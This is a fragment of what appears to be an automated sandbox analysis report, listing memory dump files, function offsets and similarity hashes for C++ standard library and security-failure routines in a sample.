                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                  • String ID: (9
                                                                                                                                                                                                                                                                  • API String ID: 3761405300-3464744488
                                                                                                                                                                                                                                                                  • Opcode ID: c424c69c1dbda239a78d9ebdd00364d348f33ec1c3427b223be4a7ad1768c63d
                                                                                                                                                                                                                                                                  • Instruction ID: 375246b8a5fe5cbdb5bb40adc7ba22960ab44582eadcef19f52b7f7c101686ec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c424c69c1dbda239a78d9ebdd00364d348f33ec1c3427b223be4a7ad1768c63d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711C3B4612A449FC310DF3BED81660BBA8BBC8310B00905AE489A7B71E3B19749CF45
                                                                                                                                                                                                                                                                  Function 00EC44A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00EC44B2
                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00EC44FC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                  • String ID: ,B
                                                                                                                                                                                                                                                                  • API String ID: 3286764726-2268942197
                                                                                                                                                                                                                                                                  • Opcode ID: 0a0a569afa2ccf16c67d749b0042258d6f93e047f7faa45b9a297a34e7e36040
                                                                                                                                                                                                                                                                  • Instruction ID: b58cc686e3c166383ee3ba0d175d8da8eb238eea3776121b2b8f8288ce15bd62
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a0a569afa2ccf16c67d749b0042258d6f93e047f7faa45b9a297a34e7e36040
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0BD709105089BCB08FBE9E5B6B6DBBB1AF40308F44116CD10677387DE319E92C755